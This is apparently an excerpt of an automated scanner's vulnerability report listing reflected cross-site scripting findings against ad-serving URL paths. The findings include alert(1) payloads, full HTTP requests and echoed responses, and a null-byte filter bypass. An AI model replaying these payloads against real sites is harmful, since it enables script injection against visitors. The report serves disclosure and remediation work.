GET /APM/iview/139941180/direct;;wi.728;hi.90/01?click=4c2db</script><script>alert(1)</script>d7be7cfafdb HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 1891 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 17:22:05 GMT
<SCRIPT Language="Javascript"> var DCcode="N4319.MSNMEN/B3889285.6;sz=728x90;"; var DCwidth="728"; var DCheight="90"; var randNum = Math.floor(Math.random() * 100000000) + 100000000; var iframesrc = "http://ad.doubleclick.net/adi/" + DCcode + ";sz=" + DCwidth + "x" + DCheight + ";ord=" + randNum + "?click=4c2db</script><script>alert(1)</script>d7be7cfafdbhttp://clk.redcated/goiframe/198094427.198102269/139941180/direct/01%3fhref="; var scriptsrc = "http://ad.doubleclick.net/adi/" + DCcode + ";abr=!ie;sz=" + DCwidth + "x" + DCheight + ";ord=" + randNu ...[SNIP]...
5.258. http://redcated/APM/iview/139941180/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/APM/iview/139941180/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faf01"-alert(1)-"5cff1b03f70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /APM/iview/139941180/direct;;wi.728;hi.90/01?click=&faf01"-alert(1)-"5cff1b03f70=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 1814 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:34:49 GMT
<SCRIPT Language="Javascript"> var DCcode="N4319.msn/B2087123.383;sz=728x90;"; var DCwidth="728"; var DCheight="90"; var randNum = Math.floor(Math.random() * 100000000) + 100000000; var iframesrc = "http://ad.doubleclick.net/adi/" + DCcode + ";sz=" + DCwidth + "x" + DCheight + ";ord=" + randNum + "?click=&faf01"-alert(1)-"5cff1b03f70=1http://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref="; var scriptsrc = "http://ad.doubleclick.net/adi/" + DCcode + ";abr=!ie;sz=" + DCwidth + "x" + DCheight + ";ord=" + rand ...[SNIP]...
The value of the ;wi.728;hi.90/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db6a3</script><script>alert(1)</script>5e444db1be0 was submitted in the ;wi.728;hi.90/01?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click=db6a3</script><script>alert(1)</script>5e444db1be0 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6864 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 17:22:07 GMT
<html><head><title>FLORIST_728x90</title> <meta HTTP-EQUIV="expires" CONTENT="0"></meta> <meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta> </head><body style="border-width:0px;margin:0px;" bgcol ...[SNIP]... e if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1) { bIsRightVersion = (2 >= nRequiredVersion); } } } detectPluginCP91283965132066(); var _CP91283965132066_Instance = { click : "db6a3</script><script>alert(1)</script>5e444db1be0", clickThruUrl: "http://clk.redcated/go/148848786/direct;wi.728;hi.90;ai.197439863.197970693.196187415;ct.$num$/01/", imgs : [] }; if (!window.armapi_a1_a1) { var armapi_a1_a1 = { initialize ...[SNIP]...
The value of the ;wi.728;hi.90/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f440c</script>34fd740c671 was submitted in the ;wi.728;hi.90/01?click parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click=f440c</script>34fd740c671 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6739 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:34:41 GMT
<html><head><title>FLORIST_728x90</title> <meta HTTP-EQUIV="expires" CONTENT="0"></meta> <meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta> </head><body style="border-width:0px;margin:0px;" bgcol ...[SNIP]... e if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1) { bIsRightVersion = (2 >= nRequiredVersion); } } } detectPluginCP91283965132066(); var _CP91283965132066_Instance = { click : "f440c</script>34fd740c671", clickThruUrl: "http://clk.redcated/go/148848786/direct;wi.728;hi.90;ai.197439863.197970693.196187415;ct.$num$/01/", imgs : [] }; if (!window.armapi_a1_a1) { var armapi_a1_a1 = { initialize ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db9c4'%3b6f7b580b6b3 was submitted in the REST URL parameter 4. This input was echoed as db9c4';6f7b580b6b3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /APM/iview/148848786/db9c4'%3b6f7b580b6b3 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7013 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 18:57:52 GMT Connection: close
5.262. http://redcated/APM/iview/148848786/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/APM/iview/148848786/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00c9648"-alert(1)-"596946acf51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c9648"-alert(1)-"596946acf51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click=&%00c9648"-alert(1)-"596946acf51=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 1746 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 17:22:17 GMT
<SCRIPT Language="Javascript"> var DCcode="N5506.MSN/B5070033.82;sz=728x90;"; var DCwidth="728"; var DCheight="90"; var randNum = Math.floor(Math.random() * 100000000) + 100000000; var iframesrc = "http://ad.doubleclick.net/adi/" + DCcode + ";sz=" + DCwidth + "x" + DCheight + ";ord=" + randNum + "?click=&%00c9648"-alert(1)-"596946acf51=1http://clk.redcated/goiframe/201270508.201301833/148848786/direct/01%3fhref="; var scriptsrc = "http://ad.doubleclick.net/adi/" + DCcode + ";abr=!ie;sz=" + DCwidth + "x" + DCheight + ";ord=" + rand ...[SNIP]...
5.263. http://redcated/APM/iview/148848786/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/APM/iview/148848786/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaf4f"-alert(1)-"841113d9fd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click=&aaf4f"-alert(1)-"841113d9fd6=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 1814 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:34:50 GMT
<SCRIPT Language="Javascript"> var DCcode="N4319.msn/B2087123.383;sz=728x90;"; var DCwidth="728"; var DCheight="90"; var randNum = Math.floor(Math.random() * 100000000) + 100000000; var iframesrc = "http://ad.doubleclick.net/adi/" + DCcode + ";sz=" + DCwidth + "x" + DCheight + ";ord=" + randNum + "?click=&aaf4f"-alert(1)-"841113d9fd6=1http://clk.redcated/goiframe/196246454.198101735/148848786/direct/01%3fhref="; var scriptsrc = "http://ad.doubleclick.net/adi/" + DCcode + ";abr=!ie;sz=" + DCwidth + "x" + DCheight + ";ord=" + rand ...[SNIP]...
5.264. http://redcated/BEL/iview/262582811/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/BEL/iview/262582811/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9888"><script>alert(1)</script>cc40f9e2ce0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /BEL/iview/262582811/direct;/01?click=&b9888"><script>alert(1)</script>cc40f9e2ce0=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 278 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:34:44 GMT
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d60d2'%3b889c50d9e7 was submitted in the REST URL parameter 4. This input was echoed as d60d2';889c50d9e7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CNT/iview/286609711/directd60d2'%3b889c50d9e7 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6858 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:52:24 GMT Connection: close
5.266. http://redcated/CNT/iview/286609711/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/CNT/iview/286609711/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ff63"-alert(1)-"b8cabc26dc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\&5ff63"-alert(1)-"b8cabc26dc6=1 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7361 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:52:09 GMT Connection: close
5.267. http://redcated/CNT/iview/286609711/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/CNT/iview/286609711/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df7dd'-alert(1)-'7cad214e775 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\&df7dd'-alert(1)-'7cad214e775=1 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7354 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:52:10 GMT Connection: close
5.268. http://redcated/CNT/iview/286609711/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/CNT/iview/286609711/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fb2a"><script>alert(1)</script>3d3a34b2b9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\&3fb2a"><script>alert(1)</script>3d3a34b2b9b=1 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7436 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:52:07 GMT Connection: close
The value of the wi.300;hi.250/direct/01/181503410?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9006</script><script>alert(1)</script>8f405b36698 was submitted in the wi.300;hi.250/direct/01/181503410?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\e9006</script><script>alert(1)</script>8f405b36698 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7456 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:51:52 GMT Connection: close
The value of the wi.300;hi.250/direct/01/181503410?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53626'-alert(1)-'73c6470eb21 was submitted in the wi.300;hi.250/direct/01/181503410?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\53626'-alert(1)-'73c6470eb21 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7346 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:51:53 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 808cf'%3b519671d0d4e was submitted in the REST URL parameter 4. This input was echoed as 808cf';519671d0d4e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CNT/iview/287065754/direct808cf'%3b519671d0d4e;pc.106032482;wi.160;hi.600/01?click= HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6885 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:35:19 GMT
5.272. http://redcated/CNT/iview/287065754/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/CNT/iview/287065754/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12e71"><script>alert(1)</script>c77fec40792 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click=&12e71"><script>alert(1)</script>c77fec40792=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6953 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:34:57 GMT
5.273. http://redcated/CNT/iview/287065754/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/CNT/iview/287065754/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48a61'-alert(1)-'72d6f3aa6b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click=&48a61'-alert(1)-'72d6f3aa6b9=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6804 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:35:04 GMT
5.274. http://redcated/CNT/iview/287065754/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/CNT/iview/287065754/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed550"-alert(1)-"3987c2801f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click=&ed550"-alert(1)-"3987c2801f9=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6786 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:35:02 GMT
<html><head><title>mdfMOTO_shop_160x600_122110</title> <meta HTTP-EQUIV="expires" CONTENT="0"></meta> <meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta> </head><body style="border-width:0px;margi ...[SNIP]... if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1) { bIsRightVersion = (2 >= nRequiredVersion); } } } detectPluginCIN1292967337071(); var _CIN1292967337071_Instance = { click : "&ed550"-alert(1)-"3987c2801f9=1", clickThruUrl: "http://clk.redcated/go/287065754/direct;pc.106032482;wi.160;hi.600;ai.195764836;ct.$num$/01/", imgs : [] }; if (!window.armapi_a1_a1) { var armapi_a1_a1 = { initialize : fu ...[SNIP]...
The value of the pc.106032482;wi.160;hi.600/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 462ea</script><script>alert(1)</script>69e81c4a77c was submitted in the pc.106032482;wi.160;hi.600/01?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click=462ea</script><script>alert(1)</script>69e81c4a77c HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6980 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:34:47 GMT
